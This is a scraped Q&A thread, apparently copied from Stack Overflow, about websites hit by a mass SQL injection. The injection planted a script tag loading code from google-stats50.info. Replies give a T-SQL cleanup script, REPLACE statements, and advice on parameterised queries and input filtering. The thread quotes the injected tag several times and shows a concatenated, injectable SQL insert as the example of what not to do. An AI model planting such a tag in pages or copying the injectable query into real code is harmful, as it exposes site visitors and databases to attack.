开发者

Deciphering this XSS attack [closed]

开发者 https://www.devze.com 2023-01-17 12:28 出处:网络
It's difficult to tell what is being asked here. This question is ambiguous, vague, incomplete, overly broad, or rhetorical andcannot be reasonably answered in its current form. For help clari
It's difficult to tell what is being asked here. This question is ambiguous, vague, incomplete, overly broad, or rhetorical and cannot be reasonably answered in its current form. For help clarifying this question so that it can be reopened, visit the help center. Closed 12 years ago.

Did anybody know more information about this attack ?

I recently got this script injected in my web sites

By the way dont go on this web site since it's the source of the infection

 </title><script src=http://google-stats50.**fo/***.php>

What kind of attack is it, SQL or CODE ?

By the way dont go on this web site since it's the source of the infection

The question is by what quind of attack this infectious attack occurs ?

We found it, and was not like twitter attack, it's was by request parameters in a url and inject sql directly in the parameter.

There is the SQL script produce by our sql team to clean your database who was infected

/*************************************************************************
        SQL INJECTED DATABASE
*************************************************************************/

DECLARE @dbName VARCHAR(200), 
        @SqlString NVARCHAR(MAX), 
        @SearchText VARCHAR(MAX), 
        @SearchTextLike VARCHAR(MAX), 
        @NbItems INT, 
        @TableName VARCHAR(255), 
        @ColoneName VARCHAR(255), 
        @objId BIGINT,
        @tmpSqlString NVARCHAR(MAX),
        @CleanUp BIT,
        @RowCount BIGINT,
        @debug BIT,
        @Msg VARCHAR(MAX);

SET @debug = 0; -- 1 = Additionnal prints

SET @CleanUp = 0; -- 1 = Update tables

SET @SearchText = '</tit开发者_Python百科le><script src=http://google-stats50.info/ur.php></script>';

SET @SearchTextLike = '%' + @SearchText + '%';

DECLARE @QueryResults TABLE (SqlString VARCHAR(MAX), TableName VARCHAR(255), ColoneName VARCHAR(255));
DECLARE @InfectedDB TABLE (InfectedDbName VARCHAR(255));
DECLARE @CleanedUpDB TABLE (DbName VARCHAR(255), Msg VARCHAR(MAX));
DECLARE @DbToValidate TABLE (DbName VARCHAR(255));  

INSERT INTO @DbToValidate
SELECT Name
FROM sys.databases
WHERE [state] = 0 AND
        Name NOT IN ('master', 'tempdb', 'model', 'msdb') AND
        Name NOT LIKE 'sys%'
ORDER BY Name;

DECLARE db_cusor CURSOR FOR 
SELECT DbName
FROM @DbToValidate;

OPEN db_cusor;

FETCH NEXT FROM db_cusor 
INTO @dbName;

WHILE @@FETCH_STATUS = 0
BEGIN
    SET @Msg = 'Traitement pour : ' + @dbName;
    INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
    PRINT @Msg;

    IF (SELECT [state] FROM sys.databases WHERE Name = @dbName) = 0
    BEGIN
        IF @debug = 1 PRINT Char(13) + '1 - Processing Database : ' + @dbName;

        --Vider le contenu
        DELETE FROM @QueryResults;

        IF @debug = 1 PRINT '2 - Vider la table @QueryResults';

        IF @CleanUp = 0
        BEGIN
            SET @SqlString = '  USE [' + @dbName + '];' +
                             '  SELECT ''SELECT @NbItems = COUNT(1) FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name' +
                             '  FROM sys.tables tbl inner join' +
                             '          sys.columns col on tbl.object_id = col.object_id' +
                             '  WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%''';
        END
        ELSE
        BEGIN
            SET @SqlString = '  USE [' + @dbName + '];' +
                             '  SELECT ''UPDATE ['' + tbl.Name + ''] SET ['' + col.name + ''] = REPLACE(CAST(['' + col.name + ''] AS VARCHAR(MAX)),''''' + @SearchText + ''''','''''''') FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name' +
                             '  FROM sys.tables tbl inner join' +
                             '          sys.columns col on tbl.object_id = col.object_id' +
                             '  WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%'''
        END

        INSERT INTO @QueryResults                   
        EXEC sp_executesql @SqlString;

        --Validation pour les erreurs
        IF @@ERROR <> 0
        BEGIN
            GOTO NEXTPRINC
        END

        IF @debug = 1 PRINT '3 - Récupérer les Query String';

        --Faire une loop sur les querys string pour voir s'il y a des injections SQL
        DECLARE query_cursor CURSOR FOR 
        SELECT SqlString, TableName, ColoneName
        FROM @QueryResults;

        OPEN query_cursor;

        FETCH NEXT FROM query_cursor 
        INTO @SqlString, @TableName, @ColoneName;

        IF @debug = 1 PRINT '4 - Cursor sur les Query String';

        WHILE @@FETCH_STATUS = 0
        BEGIN

            SET @tmpSqlString = 'USE [' + @dbName + '];' + 'SELECT @objId = OBJECT_ID(''' + @TableName + ''');'

            EXEC sp_executesql @tmpSqlString, N'@objId bigint output', @objId output

            --Validation pour les erreurs
            IF @@ERROR <> 0
            BEGIN
                GOTO NEXTINNER
            END

            IF ISNULL(@objId, -1) <> -1
            BEGIN

                SET @SqlString = 'USE [' + @dbName + '];' + @SqlString;

                IF @CleanUp = 0
                BEGIN
                    EXEC sp_executesql @SqlString, N'@NbItems int output', @NbItems output
                END
                ELSE
                BEGIN
                    EXEC sp_executesql @SqlString
                    SET @RowCount = @@ROWCOUNT
                END

                --Validation pour les erreurs
                IF @@ERROR <> 0
                BEGIN
                    GOTO NEXTINNER
                END

                IF @CleanUp = 0
                BEGIN
                    IF ISNULL(@NbItems, 0) <> 0
                    BEGIN
                        -- BD Infectée !
                        INSERT INTO @InfectedDB VALUES (@dbName);
                        PRINT '**** BD Infectée : ' + @dbName;
                        SELECT * FROM @InfectedDB;
                        BREAK;
                    END
                END
                ELSE
                BEGIN
                    IF @RowCount <> 0
                    BEGIN
                        SET @Msg = '**** Table --> [' + @TableName + '] .::. Colonne --> [' + @ColoneName + '] .::. Nb Rows --> ' + CAST(@RowCount AS VARCHAR(7));
                        INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
                        PRINT @Msg;
                    END
                END

            END

    NEXTINNER:
            -- Get the next query.
            FETCH NEXT FROM query_cursor 
            INTO @SqlString, @TableName, @ColoneName;
        END

        CLOSE query_cursor;
        DEALLOCATE query_cursor;

        IF @debug = 1 PRINT '5 - Vider cursor query';
    END
    ELSE
    BEGIN
        SET @Msg = '**** La base de données n''est pas ''ONLINE''.';
        INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
        PRINT @Msg;
    END

    SET @Msg = 'Fin traitement pour : ' + @dbName;
    INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
    PRINT @Msg;

NEXTPRINC:
    -- Get the next database.
    FETCH NEXT FROM db_cusor 
    INTO @dbName;
END

IF @CleanUp = 0
BEGIN
    SELECT * FROM @InfectedDB;
END
ELSE
BEGIN
    SELECT * FROM @CleanedUpDB;
END

GOTO FIN

FININNER: 
    CLOSE query_cursor;
    DEALLOCATE query_cursor;

FIN:
    --Fermeture du cursor
    CLOSE db_cusor;
    DEALLOCATE db_cusor;


Just happened to us as well. Almost every record in the database.

The best bet is to do the following: (we have just done this successfully)

UPDATE [mytable] set [column] =
  REPLACE([column],
          '&lt;/title&gt;&lt;script src=http://google-stats50.info/ur.php&gt;',
          '')

That line will remove the script from each field. You will have to manually check the fields though and change the UPDATE statement to suit.


I am taking a guess that every one of you has a form on your website with a submit button. I am also guessing that the forms action involves a sql statement with concatenated sql?

"INSERT INTO tbl_Contacts (name, email, enquiry) VALUES ('" & \
                           name & "', '" & email & "', '" & enquiry & "');"

If this is the case, you got SQL injection hacked and you should probably change all statements that use this syntax to "parameterised queries"

"INSERT INTO tbl_Contacts (name, email, enquiry) VALUES (@name, @email, @enquiry);"

sqlcommand.parameters.add("@name", SqlDbType.VarChar).Value = foo
sqlcommand.parameters.add("@email", SqlDbType.VarChar).Value = bar
sqlcommand.parameters.add("@enquiry", SqlDbType.VarChar).Value = baz

Hopefully this helps..


Classic XSS attack. You should be checking your inputs for HTML tags and removing them. If you are allowing people to post HTML tags then you should use a whitelist for allowed tags (and allowed tag attributes, so they can't do "onClick", for example) rather than trying to block ones you can think of that might cause trouble.


We got the same problem this morning. classic case of sql injection: you don't seem to check the parameters you got via URL. take a look to the webserver access logs - you will see update statements!


I've fixed a similar hack recently, every .asp, .js and .html file on the infected server had an extra script included, but the database was normal. In that case the hack was done via FTP, the password was not strong enough. Maybe something similar happened to you?

I've fixed it with a find-and-replace-all in a text-editor supporting multiple documents at once. (notepad++)

0

精彩评论

暂无评论...
验证码 换一张
取 消